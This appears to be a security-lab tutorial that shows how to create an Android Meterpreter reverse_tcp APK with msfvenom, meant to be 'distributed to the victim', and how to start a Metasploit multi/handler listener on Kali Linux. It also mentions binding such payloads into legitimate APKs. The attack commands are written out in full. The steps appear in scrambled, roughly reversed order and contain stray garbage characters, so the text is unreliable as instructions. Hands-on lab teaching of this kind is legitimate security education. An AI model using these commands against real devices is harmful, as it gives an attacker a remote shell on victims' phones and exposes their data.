Verify the SDK location is changed to something easily accessible, for example, the same location as Android Studio installation location itself. Verify that Android SDK Android virtual device is checked in like the screenshot below. Open the setup file named Android-Studio-bundle-xxxxx-windows and proceed with the installation process. Open a VM (preferably Windows OS) and install Android studio from Step 2: To perform this exploit, we need to have an emulator ready where we would be sharing the apk. Advanced attacks can be pursued by binding these files with legitimate APKs, which is beyond the scope of this lab. Open a new terminal and type the above command to generate an apk file which will be distributed to the victim. Open a new terminal.Ĭommand: msfvenom –p Android/meterpreter/reverse_tcp LHOST=ip_address LPORT=port_number –R > filename.apk Once you type exploit, your listener should be up and running waiting for an incoming wildcard connection. We can use the command ‘show options’ to see the various inputs an exploit takes for running successfully.
In this case, we will search for the Android meterpreter payload.Ĭommand: msf> set payload Android/meterpreter/reverse_tcpĪlong with ‘use’ and ‘search’ commands, ‘set’ is another command used in Metasploit to set a particular payload for an exploit. You can use the ‘search’ command within msfconsole to search for a keyword. In this case, we wish to use the multi/handler exploit, which facilitates listening to an incoming wildcard connection. In Metasploit, use command uses a particular model of the framework. Once you verify and note down the IP address, we shall open the MSF console to create a listener for our exploit.
We will be using this IP address in our exploit. Open the terminal in the Kali Linux, and note down the IP address of the system. Verify the IP address of the Kali machine. Login to the Kali Linux virtual machine using the default credentials given above. Open Kali Linux OS on Oracle VM VirtualBox. Creating an APK and initiating a multi/handler exploit Step 1:
0 kommentar(er)
